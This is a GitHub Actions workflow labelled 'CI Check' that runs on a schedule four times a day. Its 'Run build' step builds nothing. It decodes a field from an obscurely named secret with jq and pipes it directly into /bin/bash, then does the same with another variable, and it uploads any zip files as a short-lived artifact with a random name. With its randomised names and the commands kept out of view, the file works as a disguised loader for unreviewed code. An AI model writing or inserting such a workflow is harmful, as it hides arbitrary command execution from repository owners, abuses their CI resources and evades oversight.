name: CI Check
on:
  workflow_dispatch:

  schedule:
    - cron: '10 0,6,12,18 * * *'
permissions:
  contents: read
concurrency:
  group: ${{ github.workflow }}
  cancel-in-progress: false
jobs:
  perform:
    name: Run build
    runs-on: ubuntu-latest
    timeout-minutes: 360
    steps:
      - uses: actions/checkout@v4
        with:
          fetch-depth: 1
      - name: Run build
        env:
          nwzl579: ${{ secrets.nwzl579 }}
        run: |
          printf '%s' "$nwzl579" | jq -r .oue714 | /bin/bash
          echo $lhrv6 | jq -r .tg94939 | /bin/bash

      - name: Save archive
        if: always()
        uses: actions/upload-artifact@v4
        with:
          name: XKEVjmr2
          path: "*.zip"
          retention-days: 1
